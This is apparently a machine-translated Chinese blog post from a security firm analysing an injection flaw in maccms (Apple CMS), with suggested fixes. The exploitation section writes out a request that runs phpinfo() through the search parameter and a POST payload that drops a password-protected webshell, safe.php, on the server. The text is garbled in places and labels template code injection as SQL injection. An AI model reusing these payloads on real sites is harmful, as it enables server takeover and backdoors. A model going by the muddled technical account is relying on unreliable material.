苹果内容管理系统是目前许多电影网站使用的一套网站系统。它是开源的,免费的,具有良好的扩展性。它支持一键式收集、伪静态和高并发性。它赢得了许多站长的青睐。最近,网站安全检查发现maccms存在网站漏洞。sql注入用于盲目获取数据库的管理员帐户密码。我们将仔细分析和研究漏洞的细节。

maccms漏洞的分析与修复

苹果CMS使用php语言开发的代码,数据库是mysql类型。这种体系结构是常见且稳定的,但是存在许多安全问题。这一次,发现了一个sql注入漏洞。网站根目录下inc文件模块目录中的vod.php代码如下图所示:

代码中的空($wd)函数,在判断是否为空的逻辑过程中,将安全地过滤前一用户访问带来的参数。我们跟踪代码,找到苹果内容管理系统的配置文件。在function.php的配置文件代码里,李看到网站的所有请求方法,包括get、post和cookies的提交方法,都被安全地强行逃脱了。这就是网站漏洞问题发生的地方。

我们已经仔细发现maccms使用了360 security提供的反sql注入阻塞代码。360的sql注入预防是几年前开发的,并在网络上公开。它已经很长时间没有更新和维护了,并且仍然存在绕过sql注入代码的情况。在参数值之间进行实体转换时,360的sql拦截规则不拦截空白字符和反斜杠,导致恶意参数可以绕过并直接请求到苹果cms的后端数据库,以获取苹果CMS的管理员帐户密码。

让我们看看如何利用苹果内容管理系统的漏洞。从上述漏洞的细节可以看出,在阻止sql注入语句的过程中,存在可以绕过的漏洞。让我们使用%0b和空格来注入代码。在sql语句的连接中,可以插入反斜杠来报告单引号,从而绕过对苹果内容管理系统的安全拦截。声明内容如下:

获取请求:

http://127.0.0.1/index。PHP?m = VOD-搜索和。wd={if-A:phpinfo()}{endif-A}

您可以直接查看php的具体信息。

开机自检请求

Webshell可以直接获得。

http://127.0.0.1/index。PHP?m = VOD-搜索

帖子内容如下:

wd = { if-A:print(fput % 28 fopen % 28 _ decode % 28 y5 waha % 29,w%29,_ decode % 28 pd9 Wahagqgv2ywWojf9 Qt 1 uw 2 ndktsgpz4x % 29% 29)} { endif-A }

可以直接生成带有木马的后门代码,文件名是safe.php,木马链接密码是安全的。

如何修复苹果cms网站的漏洞?

对于网站漏洞的修复,我们需要知道漏洞的原因以及它为什么绕过苹果cms的安全过滤,苹果CMS使用的加斜杠安全功能,在sql中没有单引号安全保护,换句话说也很容易忘记添加引号,在安全过滤的后处理过程中可以插入单引号,并且由于带斜杠可以添加单引号。编码和解码导致绕过addslash,注入和绕过urldecode编码。根据上述漏洞旁路,我们的正弦安全提出修复漏洞:网址解码的双层转义,get、post和cookies拦截规则的安全更新,空间的加强和百分比符号的拦截。如果您不熟悉程序代码,建议咨询专业网站安全公司来处理和解决问题。

发布评论

分享到:

「乌鲁木齐关键词优化」SEO思维陷阱:收录与索引有什么区别
你是第一个吃螃蟹的人
发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。